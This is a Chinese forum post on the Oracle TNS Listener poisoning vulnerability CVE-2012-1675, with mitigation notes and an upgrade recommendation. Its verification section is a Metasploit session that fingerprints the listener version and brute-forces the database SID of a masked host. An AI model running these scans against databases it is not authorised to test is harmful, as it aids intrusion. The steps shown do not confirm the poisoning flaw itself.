远程数据投毒漏洞(CVE-2012-1675)
1、漏洞简介:
允许攻击者在不提供用户名/密码的情况下,向远程“TNS Listener”组件处理的数据投毒的漏洞。
COST 是class of secure transports 的缩写。是为了控制实例注册提供的一种安全控制机制。其作用是对于一个确定的listener,限制哪些实例通过哪些协议可以进行注册。这将避免有其他远程实例进行恶意注册,并由此产生信息泄露等风险。
它通过在 listner.ora中设置参数SECURE_REGISTER_listener_name的值,指定为一个transport list(限定的注册协议列表,如IPC、TCP、TCPS)来实现这一功能。 该功能从 10.2.0.3 版本开始支持(虽然10g R2的在线文档中并未明确说明),一直到11.2.0.4版本及之后依然可用。但是,在11.2.0.4后,oracle建议使用默认的VNCR配置。
2、漏洞危害:
攻击者可以在不需要用户名密码的情况下利用网络中传送的数据消息(包括加密或者非加密的数据),如果结合(CVE-2012-3137漏洞进行密码破解)从而进一步影响甚至控制局域网内的任何一台数据库。
3、漏洞验证:
msf:- use auxiliary/admin/oracle/tnscmd
- use auxiliary/admin/oracle/sid_brute
sid_brute——爆破oracle的SID- msf > use auxiliary/admin/oracle/tnscmd
- msf auxiliary(tnscmd) > info
- Name: Oracle TNS Listener Command Issuer
- Module: auxiliary/admin/oracle/tnscmd
- License: Metasploit Framework License (BSD)
- Rank: Normal
- Disclosed: 2009-02-01
- Provided by:
- MC <[email protected]>
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
- RHOST yes The target address
- RPORT 1521 yes The target port (TCP)
- Description:
- This module allows for the sending of arbitrary TNS commands in
- order to gather information. Inspired from tnscmd.pl from
- www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd
- msf auxiliary(tnscmd) > set RHOST www.xxxx.cc
- RHOST => www.xxxx.cc
- msf auxiliary(tnscmd) > show options
- Module options (auxiliary/admin/oracle/tnscmd):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
- RHOST www.xxxx.cc yes The target address
- RPORT 1521 yes The target port (TCP)
- msf auxiliary(tnscmd) > run
- [*] www.xxxx.cc:1521 - Sending '(CONNECT_DATA=(COMMAND=VERSION))' to www.xxxx.cc:1521
- [*] www.xxxx.cc:1521 - writing 90 bytes.
- [*] www.xxxx.cc:1521 - reading
- [*] www.xxxx.cc:1521 - .M.......6.........-. ..........(DESCRIPTION=(TMP=)(VSNNUM=169869568)(ERR=0)).\........TNSLSNR for Linux: Version 10.2.0.1.0 - Production..TNS for Linux: Version 10.2.0.1.0 - Production..Unix Domain Socket IPC NT Protocol Adaptor for Linux: Version 10.2.0.1.0 - Production..Oracle Bequeath NT Protocol Adapter for Linux: Version 10.2.0.1.0 - Production..TCP/IP NT Protocol Adapter for Linux: Version 10.2.0.1.0 - Production,,.........@
- [*] Auxiliary module execution completed
- msf auxiliary(tnscmd) > use auxiliary/admin/oracle/sid_brute
- msf auxiliary(sid_brute) > show options
- Module options (auxiliary/admin/oracle/sid_brute):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST yes The target address
- RPORT 1521 yes The target port (TCP)
- SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
- SLEEP 1 no Sleep() amount between each request.
- msf auxiliary(sid_brute) > set RHOST www.xxxx.cc
- RHOST => www.xxxx.cc
- msf auxiliary(sid_brute) > show options
- Module options (auxiliary/admin/oracle/sid_brute):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST www.xxxx.cc yes The target address
- RPORT 1521 yes The target port (TCP)
- SIDFILE /usr/share/metasploit-framework/data/wordlists/sid.txt no The file that contains a list of sids.
- SLEEP 1 no Sleep() amount between each request.
- msf auxiliary(sid_brute) > run
- [*] www.xxxx.cc:1521 - Starting brute force on www.xxxx.cc, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
- [+] www.xxxx.cc:1521 - www.xxxx.cc:1521 Found SID 'ORCL'
- [*] www.xxxx.cc:1521 - Done with brute force...
- [*] Auxiliary module execution completed
- msf auxiliary(sid_brute) >
更新升级最新的oracle。
参考:
https://www.cnblogs.com/chendeming/p/9087493.html
https://blog.csdn.net/archersaber39/article/details/78932530
http://www.freebuf.com/articles/database/54289.html |
发表于 2018-12-7 13:10
|